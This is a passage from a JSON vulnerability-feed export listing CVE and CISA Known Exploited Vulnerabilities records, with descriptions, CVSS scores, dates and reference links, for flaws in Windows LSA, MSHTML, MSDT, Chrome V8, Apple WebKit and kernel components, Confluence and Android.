"NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-36942", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36942", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-15T16:28:43", "description": "Windows LSA Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-10T21:15:00", "type": "prion", "title": "CVE-2022-26925", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26925"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-26925", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-26925", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-15T15:50:08", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22587", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-28T16:49:00", "id": "PRION:CVE-2022-22587", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T03:03:33", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-15T22:15:00", "type": "prion", "title": "CVE-2021-30551", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-09-28T20:02:00", "id": "PRION:CVE-2021-30551", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T15:50:17", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22620", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "id": "PRION:CVE-2022-22620", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:30:09", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "prion", "title": "CVE-2021-26084", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-26084", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:11:26", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-40444", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-14T11:49:00", "id": "PRION:CVE-2021-40444", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Google Pixel contains a possible out-of-bounds write due to a logic error in the code that could lead to local escalation of privilege.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T00:00:00", "type": "cisa_kev", "title": "Google Pixel Out-of-Bounds Write Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-04-11T00:00:00", "id": "CISA-KEV-CVE-2021-39793", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apple iOS and iPadOS contain a buffer overflow vulnerability that could allow an application to execute code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "cisa_kev", "title": "Apple iOS and iPadOS Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30983"], "modified": "2022-06-27T00:00:00", "id": "CISA-KEV-CVE-2021-30983", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apple IOMobileFrameBuffer contains a memory corruption vulnerability which can allow a malicious application to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "Apple Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2022-22587", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Local Security Authority (LSA) contains a spoofing vulnerability where an attacker can coerce the domain controller to authenticate to the attacker using NTLM.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-01T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows LSA Spoofing Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26925"], "modified": "2022-07-01T00:00:00", "id": "CISA-KEV-CVE-2022-26925", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Google Chromium V8 Engine contains a type confusion vulnerability which allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability affects web browsers that utilize Chromium, including Google Chrome and Microsoft Edge.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30551", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Win32k contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-04T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2022-02-04T00:00:00", "id": "CISA-KEV-CVE-2022-21882", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Apple Webkit, which impacts iOS, iPadOS, and macOS, contains a vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-11T00:00:00", "type": "cisa_kev", "title": "Apple Webkit Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T00:00:00", "id": "CISA-KEV-CVE-2022-22620", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft MSHTML contains a unspecified vulnerability which allows for remote code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Local Security Authority (LSA) contains a spoofing vulnerability allowing an unauthenticated attacker to call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-36942", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-11T23:25:24", "description": "A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T00:00:00", "id": "CISA-KEV-CVE-2022-30190", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-23T15:41:36", "description": "In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T15:15:00", "type": "cve", "title": "CVE-2021-39793", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-03-23T19:25:00", "cpe": ["cpe:/o:google:android:-"], "id": "CVE-2021-39793", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39793", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:41:39", "description": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.2 and iPadOS 15.2. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-24T19:15:00", "type": "cve", "title": "CVE-2021-30983", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30983"], "modified": "2021-12-28T20:40:00", "cpe": [], "id": "CVE-2021-30983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30983", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-05-27T14:19:37", "description": "Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", 